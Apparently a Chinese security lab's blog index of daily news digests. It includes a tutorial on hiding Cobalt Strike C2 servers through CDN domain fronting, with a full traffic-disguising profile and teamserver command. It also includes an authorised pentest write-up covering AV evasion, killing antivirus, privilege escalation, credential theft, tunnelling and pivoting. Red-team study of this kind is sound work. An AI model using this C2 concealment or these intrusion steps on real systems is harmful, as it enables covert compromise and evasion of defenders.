网络安全日报 2022年11月10日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、VMware修复了Workspace ONE Assist中的三个身份验证漏洞 https://www.bleepingcomputer.com/news/security/vmware-fixes-three-critical-auth-bypass-bugs-in-remote-access-tool/ 2、微软修复了ProxyNotShell零日漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-proxynotshell-exchange-zero-days-exploited-in-attacks/ 2、谷歌披露监控供应商利用三星手机的零日漏洞 https://securityaffairs.co/wordpress/138302/hacking/surveillance-vendor-exploited-samsung-phone-zero-days.html 3、攻击者利用 IPFS 去中心化网络托管恶意软件 https://www.securityweek.com/attackers-using-ipfs-distributed-bulletproof-malware-hosting 4、研究人员发现一个名为Cloud9的新Chrome浏览器僵尸网络 https://www.bleepingcomputer.com/news/security/malicious-extension-lets-attackers-control-google-chrome-remotely/ 5、英国情报公司雇用大批印度黑客进行非法“调查” https://www.secrss.com/articles/48738 6、《信息安全技术 关键信息基础设施安全保护要求》发布 https://www.freebuf.com/news/349108.html 7、新的 IceXLoader 恶意软件变种感染了全球数千名受害者 https://thehackernews.com/2022/11/new-icexloader-malware-loader-variant.html 8、英特尔和 AMD周二补日解决了数十个漏洞 https://www.securityweek.com/intel-amd-address-many-vulnerabilities-patch-tuesday-advisories 9、Microsoft 修补了 MotW 零日漏洞 https://www.securityweek.com/microsoft-patches-motw-zero-day-exploited-malware-delivery 10、黑客开始泄露从Medibank 窃取的敏感医疗记录 https://www.securityweek.com/hackers-leak-australian-health-records-dark-web
域前置技术和C2隐藏
域前置介绍 域前置又译为域名幌子,是一种隐藏连接真实端点来规避审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。 域前置工作原理 域前置核心就是CDN,可以通过添加 A 记录或 AAAA 记录解析的方式将网站域名指向网站服务器公网 IP 地址,来实现用户可以通过域名直接访问已部署在服务器上的网站,而无需使用难记且无明显标识的 IP 地址访问。CDN能够对域名进行加速,当对某个域名进行访问时,并不会直接解析到IP,因此可以给攻击VPS申请一个CDN加速服务,从而达到隐藏IP的效果 CDN工作原理 CDN又叫内容分发网络(Content Delivery Network) 当用户访问域名时,先请求LDNS(即本地dns),如果有缓存会返回给用户ip地址,如果LNDS无缓存即向授权DNS请求,授权DNS解析域名返回别名域名,域名解析请求发送至公有云DNS调度系统,则会分配最佳节点ip地址,LDNS会缓存该IP地址,用户根据该ip地址请求资源,节点ip隐藏了真实ip的地址。 搭建过程 这里选择腾讯云的域名 先实名后注册,注册时间可能比较久,在腾讯云服务器上,根据申请的域名添加解析记录。 域名备案,实际上国内的备案了之后Redteam已无法使用了。 注册 cloudflare https://www.cloudflare.com/zh-cn/进入后添加站点 输入申请的域名别名,选择免费即可 继续 这里会对域名的A记录和CNAME自动进行检测 这个时候邮箱会收到cloudflare的邮件。 修改dns记录,域名注册->我的域名->概览位置修改dns 然后等待dns刷新即可,此时我们ping一下我们的域名发现,解析后的ip地址不是真实的ip地址。 ip地址为cloudflare的ip nslookup查询 SSL/TLS 如果要实现https加密需要下载配置c2证书 下载证书 在VPS需重新生成cs的配置文件cobalstrike.store C2配置隐藏 项目地址 https://github.com/rsmudge/Malleable-C2-Profilesset sleeptime "5000"; set jitter   "0"; set maxdns   "255"; set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; http-get {   set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";       client {           header "Accept" "*/*";       header "Host" "www.xxx.xxx";   #配置自己的根域名不是别名           metadata {           base64;           prepend "session-token=";           prepend "skin=noskin;";           append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";           header "Cookie";       }   }       server {           header "Server" "Server";       header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";       header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";       header "X-Frame-Options" "SAMEORIGIN";       header "Content-Encoding" "gzip";           output {           print;       }   } } http-post {       set uri "/N4215/adj/amzn.us.sr.aps";       client {           header "Accept" "*/*";       header "Content-Type" "text/xml";       header "X-Requested-With" "XMLHttpRequest";       header "Host" "www.xxx.xxx";   #配置自己的根域名不是别名           parameter "sz" "160x600";       parameter "oe" "oe=ISO-8859-1;";           id {           parameter "sn";       }           parameter "s" "3717";       parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";           output {           base64;           print;       }   }       server {           header "Server" "Server";       header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";       header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";       header "X-Frame-Options" "SAMEORIGIN";       header "x-ua-compatible" "IE=edge";           output {           print;       }   } } 启动服务端,调用配置文件 ./teamserver cs服务端ip password config.profile 生成监听 保存 生成64位的应用程序 成功上线 TIPS 实名注册的腾讯云域名的话是有备案的,所以这里的话建议选择国外的服务器注册域名。
网络安全日报 2022年11月09日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、谷歌修补Android中的高危提权漏洞 https://www.securityweek.com/google-patches-high-severity-privilege-escalation-vulnerabilities-android 2、勒索软件团伙威胁要发布 Medibank 客户信息 https://www.securityweek.com/ransomware-gang-threatens-publish-medibank-customer-information 3、美国查获了10年前黑客从丝绸之路窃取的 34 亿美元比特币 https://www.securityweek.com/us-seizes-34-billion-bitcoin-stolen-silk-road 4、西门子和施耐德电气修复了多个严重漏洞 https://www.securityweek.com/ics-patch-tuesday-siemens-addresses-critical-vulnerabilities 5、加拿大肉类巨头 Maple Leaf Foods遭网络攻击导致业务中断 https://www.securityweek.com/cyberattack-causes-disruptions-canadian-meat-giant-maple-leaf-foods 6、Citrix ADC 和Gateway 受到高危身份验证绕过漏洞的影响 https://securityaffairs.co/wordpress/138264/security/citrix-gateway-adc-flaws.html 7、SmokeLoader 活动分发新的 Laplas Clipper 恶意软件 https://securityaffairs.co/wordpress/138251/malware/smokeloader-delivers-laplas-clipper.html 8、Amadey恶意软件在被黑机器上部署 LockBit 3.0 勒索软件 https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html 9、诺基亚修复移动基带套件中的漏洞 https://www.itnews.com.au/news/nokia-moves-to-patch-vulnerable-mobile-baseband-kit-587514 10、安全厂商发布RanHassan勒索软件免费解密工具 https://www.bitdefender.com/blog/labs/ranhassan-ransomware-decryptor-now-available/
网络安全日报 2022年11月08日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、澳大利亚健康保险公司Medibank 确认数据泄露影响了 970 万客户 https://www.securityweek.com/medibank-confirms-data-breach-impacts-97-million-customers 2、2023年微软将继续向乌克兰提供免费云服务,高达1亿美元 https://www.theregister.com/2022/11/04/microsoft_ukraine_tech_support/ 3、日本宣布正式加入北约网络防御中心 https://www.secrss.com/articles/48669 4、研究人员发现针对印度政府雇员的新恶意软件活动 https://thehackernews.com/2022/11/researchers-detail-new-malware-campaign.html 5、波音子公司遭网络攻击,致使全球多家航司航班规划中断 https://www.secrss.com/articles/48677 6、记者卧底调查:“网课爆破”污秽不堪,涉嫌违法犯罪 https://news.ycwb.com/2022-11/05/content_41149409.htm 7、湖南一公务员非法获取公民个人信息4亿余条:非法获利170余万 https://www.secrss.com/articles/48689 8、Check Point发布Q3全球网络攻击报告,医疗保健行业最易受勒索攻击 http://www.anquan419.com/news/21/1677.html 9、"Justice Blade" 黑客组织针对沙特阿拉伯 https://securityaffairs.co/wordpress/138213/hacking/justice-blade-targets-saudi-arabia.html 10、网络钓鱼活动滥用Microsoft Dynamics 365 客户语音窃取用户凭证 https://securityaffairs.co/wordpress/138147/cyber-crime/microsoft-dynamics-365-customer-voice-phishing.html
网络安全日报 2022年11月07日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、LockBit 3.0 团伙声称从 Kearney & Company 窃取了数据 https://securityaffairs.co/wordpress/138136/cyber-crime/lockbit-ransomware-kearney-company.html 2、微软称零日漏洞在越来越短的时间内被大规模利用 https://securityaffairs.co/wordpress/138100/security/treat-actors-zero-day.html 3、智利ALMA天文台因网络攻击而关闭运营 https://www.bleepingcomputer.com/news/security/alma-observatory-shuts-down-operations-due-to-a-cyberattack/ 4、AstraZeneca暴露了对其患者数据信息的访问权限 https://techcrunch.com/2022/11/03/astrazeneca-passwords-exposed-patient-data/ 5、网络攻击导致丹麦国家铁路列车停止运行 https://www.securityweek.com/cyberattack-causes-trains-stop-denmark 6、Robin Banks网络钓鱼活动重新上线 https://www.bleepingcomputer.com/news/security/robin-banks-phishing-service-returns-to-steal-banking-accounts/ 7、英国政府机构正在扫描该国托管的所有互联网设备 https://www.bleepingcomputer.com/news/security/british-govt-is-scanning-all-internet-devices-hosted-in-uk/ 8、研究人员发现多封针对推特认证用户的钓鱼邮件 https://www.bleepingcomputer.com/news/security/as-twitter-brings-on-8-fee-phishing-emails-target-verified-accounts 9、中央网信办印发《关于切实加强网络暴力治理的通知》 https://www.freebuf.com/news/348958.html 10、因对Twitter安全和内容审核不满,马斯克裁撤Twitter整个安全部门 https://www.freebuf.com/news/348957.html
网络安全日报 2022年11月04日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Splunk 修补了 9 个企业产品中的高危漏洞 https://www.securityweek.com/splunk-patches-9-high-severity-vulnerabilities-enterprise-product 2、LockBit 勒索软件团伙声称已入侵跨国集团 Continental https://securityaffairs.co/wordpress/138062/cyber-crime/lockbit-gang-claims-continental-hack.html 3、安全研究人员将 Black Basta 勒索软件与 FIN7 网络犯罪团伙关联 https://securityaffairs.co/wordpress/138037/cyber-crime/black-basta-linked-fin7.html 4、黑客使用恶意版本的 KeePass 和 SolarWinds 软件分发 RomCom RAT https://thehackernews.com/2022/11/hackers-using-rogue-versions-of-keepass.html 5、Drinik 恶意软件现在针对 18 家印度银行 https://cyware.com/news/drinik-malware-now-targets-18-indian-banks-1921d2bc 6、Emotet 僵尸网络在沉寂 5 个月后再次开始传播恶意软件 https://www.bleepingcomputer.com/news/security/emotet-botnet-starts-blasting-malware-again-after-5-month-break/ 7、超过 250 个美国新闻网站遭供应链攻击传播恶意软件 https://www.securityweek.com/over-250-us-news-websites-deliver-malware-supply-chain-attack 8、研究人员在数十个PyPI软件包中发现W4SP窃密木马 https://www.bleepingcomputer.com/news/security/dozens-of-pypi-packages-caught-dropping-w4sp-info-stealing-malware/ 9、研究人员发现新型Laplas Clipper通过SmokeLoader进行传播 https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/ 10、OPERA1ER APT 黑客针对非洲数十家金融组织 https://thehackernews.com/2022/11/researchers-detail-opera1er-apt-attacks.html
记一次详细的实战渗透
前言 一次授权的渗透测试,过程比较详细,充满了巧合,也算比较有意思直接记录一下,图片打码比较严重,应该是不影响阅读!!!! 前端RCE 信息搜集拿到的资产,通过序列化实现的RCE,但是这里只能执行命令并不能上传等操作,并且服务器还有杀软,所以互联网实现RCE需要做免杀。 http://xxx.xxx.xxx.xxx:xxxx这个不用多说了直接上工具就ok了,这里是windwos系统并不能反弹,所以使用命令上线CS还是可以的。 cs起监听,生成hta文件。 生成的hta文件是没有原生的木马,这里基本上常见的杀软都是过不掉的,所以这里需要做免杀,因为一般的上线方式也都尝试过了,powershell等方式也都不行,有杀软的情况下一般poweshell的执行都会被拦掉,所以这里使用mstha上线,免杀的思路之前的文章CS免杀姿势可以看到,总的来讲思路大差不差。 之前的文章中没有介绍进程注入的免杀手段,如果说一般钓鱼的话使用进程注入的免杀手段是为了避免进程被提前终止或者因为关联的进程树被终止导致CS的连接断掉,mstha上线本来就是弹窗执行,针对服务器的话根本不需要考虑这种情况。 上传到web服务器。 上传免杀后的hta文件,选择一个端口,避免端口冲突。 执行命令 目标服务器成功上线。 发现使用的杀软为360杀毒,简单的加壳是过了360安全卫士的,但是被是杀掉了,所以混淆之后的文件特征且加壳是过杀毒的,360杀毒和安全卫士使用的肯定是同一个病毒库,为什么过了安全卫士杀毒过不掉杀毒,刚开始我以为360杀毒确实比360安全卫士np,后来问过做jinshan杀毒的大佬之后了解到,因为360的病毒库确实大,在文件落地的时候可能会出现检测不到病毒特征的情况,所以说查杀确实存在玄学问题。 虽然是administrator还是获取不到用户名密码,提权。 kill掉360杀毒的进程,提权。 winserver 2008,直接土豆提权,获取system权限。 获取凭证拿到administrator的密码,其实这里也可以直接该密码的。 shell net user administrator xxxxxxxx 这里因为能提权还是算了。 内网穿透 做隧道的时候看个人习惯,比如说frp、proxy-admin、nps等,这里还是根据情况选择,frp做穿透配置文件要求直接写死,修改端口比较麻烦;proxy-admin做穿透,不支持socks协议,仅支持tcp、http、udp协议,等等。所以我个人还是比较喜欢使用nps的,上线之后隧道随意搭建即可。 新增客户端之后,目标服务器上传客户端和配置文件。 目标服务器上线。 搭建隧道即可,查询RDP开放情况。 利用tcp隧道端口转发。 连接远程桌面。 这里有向日葵是一直开放的进程,也获取到了向日葵的控制码,但是不建议连接向日葵,目前版本的向日葵因为需要登录连接,连接的时候会显示主机名,且这个日志官方是有的,我这里是授权的,非授权的情况下是完全可以溯源的。 查询RDP连接记录,发现一台机器可直接远程桌面。 另一台服务器权限拿到,但是不出网。 转发上线 因为不出网转发上线,第二服务器,这里称为B,关闭B的杀软和防火墙。 上传exe,执行,实现转发上线。 发现B为A的数据库服务器,且内网有报表系统,但是没有用户和密码,而后发现有意思的一点儿是,这台服务器上有。 套账解码工具,管理员可能也经常忘记密码吧,解码获取内网报表的系统账号。 内网系统端口转发出来,走http代理,成功登录系统。 内网扫描 这里使用了几种工具做的内网扫描,扫描了10的A段和192、172的A段。 总结 整体来说难度不大,没有域,难点在免杀,能拿报表系统是巧合,转发上线没意外,似乎内网环境比较大,但是在进行端口扫描的时候发现无端口开放情况,且不同的工具探测到的存活主机数目也不相同,可能是DMZ区也说不定,但是也没探测到该段有任何安全设备,这个是比较奇怪的地方。文件都比较老了都是几年前的数据,这里可能服务器已经很早就做了隔离,但是能拿到的数据和能拿到的权限都已经拿到了,可以结束了。
网络安全日报 2022年11月03日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Fortinet 修补影响多个产品的6 个高危漏洞 https://www.securityweek.com/fortinet-patches-6-high-severity-vulnerabilities 2、一种新的安卓恶意软件-SandStrike针对讲波斯语的宗教少数群体 https://securityaffairs.co/wordpress/137990/hacking/sandstrike-malware-cyberespionage.html 3、Dropbox 披露安全漏洞,攻击者未经授权访问了 130 个 GitHub 源码库 https://securityaffairs.co/wordpress/137975/hacking/dropbox-account-hacked-2fa-jpg.html 4、OpenSSL 项目修复了两个高危漏洞 https://securityaffairs.co/wordpress/137965/security/openssl-fixed-two-vulnerabilities.html 5、Checkmk IT Infrastructure监控软件存在多个漏洞 https://thehackernews.com/2022/11/multiple-vulnerabilities-reported-in.html 6、微软修补了Azure Cosmos DB中的漏洞 https://www.securityweek.com/microsoft-patches-azure-cosmos-db-flaw-leading-remote-code-execution 7、Fodcha DDoS 僵尸网络重出江湖,增加勒索功能 https://thehackernews.com/2022/10/fodcha-ddos-botnet-resurfaces-with-new.html 8、澳大利亚国防部通信平台遭黑客攻击 https://www.anquanke.com/post/id/282400 9、Mozilla Firefox 修复了Windows 11新功能导致死机的BUG https://www.bleepingcomputer.com/news/security/mozilla-firefox-fixes-freezes-caused-by-new-windows-11-feature/ 10、美国财政部:2021年金融机构因勒索攻击损失超12亿美元 https://www.secrss.com/articles/48587
网络安全日报 2022年11月02日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、安天发布疑似Lazarus组织针对韩国的攻击活动分析 https://mp.weixin.qq.com/s/w-KF5HUNe8-KlmFl6zLkZw 2、黑客以400万美元的价格出售全球576个企业网络的访问权限 https://www.bleepingcomputer.com/news/security/hackers-selling-access-to-576-corporate-networks-for-4-million/ 3、明年 2 月起,微软 Win10 系统将永久禁用 IE11 https://www.ithome.com/0/649/960.htm 4、工信部拟规定:智能网联汽车生产商应建立车辆产品网络安全等制度 https://www.chinanews.com.cn/cj/2022/10-28/9881839.shtml 5、中国台湾全岛个人信息被放在网上兜售,黑客开价5000美元 https://www.freebuf.com/news/348462.html 6、苹果推出新的安全研究网站,加快对漏洞报告的响应 https://www.ithome.com/0/649/517.htm 7、LockBit 3.0团伙声称从法国国防和技术集团泰雷兹窃取了数据 https://securityaffairs.co/wordpress/137955/cyber-crime/lockbit-3-0-thales.html 8、ConnectWise 解决了服务器备份解决方案中的关键RCE漏洞 https://securityaffairs.co/wordpress/137946/uncategorized/connectwise-rce.html 9、VMware 警告近期针对NSX-V 漏洞的利用 https://www.securityweek.com/vmware-warns-exploit-recent-nsx-v-vulnerability 10、 欧盟委员会推出首个欧盟GDPR认证机制 https://www.secrss.com/articles/48524
网络安全日报 2022年11月01日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、黑客正在对新西兰航空公司发起撞库攻击 https://securityaffairs.co/wordpress/137793/cyber-crime/air-new-zealand-breach.html 2、0patch发布Windows MoTW零日漏洞非官方补丁 https://www.bleepingcomputer.com/news/microsoft/actively-exploited-windows-motw-zero-day-gets-unofficial-patch/ 3、BlackByte勒索软件攻击了Asahi Group Holdings公司 https://securityaffairs.co/wordpress/137803/cyber-crime/blackbyte-ransomware-asahi-group-holdings.html 4、三星 Galaxy Store 漏洞可能让黑客在目标设备上秘密安装应用 https://thehackernews.com/2022/10/samsung-galaxy-store-bug-couldve-let.html 5、Snatch 勒索团伙声称已入侵军事供应商 HENSOLDT France https://securityaffairs.co/wordpress/137886/cyber-crime/snatch-hensoldt-france-ransomware.html 6、Fodcha DDoS 僵尸网络以新功能重新出现 https://thehackernews.com/2022/10/fodcha-ddos-botnet-resurfaces-with-new.html 7、2023年1月1日施行!《网络产品安全漏洞收集平台备案管理办法》发布 https://www.freebuf.com/news/348234.html 8、VMware 修补了NSX-V中一个危险等级 9.8/10 高危漏洞 https://www.solidot.org/story?sid=73209 9、新的"Azoz勒索软件"擦拭器试图陷害安全研究人员 https://www.bleepingcomputer.com/news/security/new-azov-data-wiper-tries-to-frame-researchers-and-bleepingcomputer/ 10、谷歌发布紧急 Chrome 107 更新以修补被利用的零日漏洞 https://www.securityweek.com/google-releases-emergency-chrome-107-update-patch-actively-exploited-zero-day
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页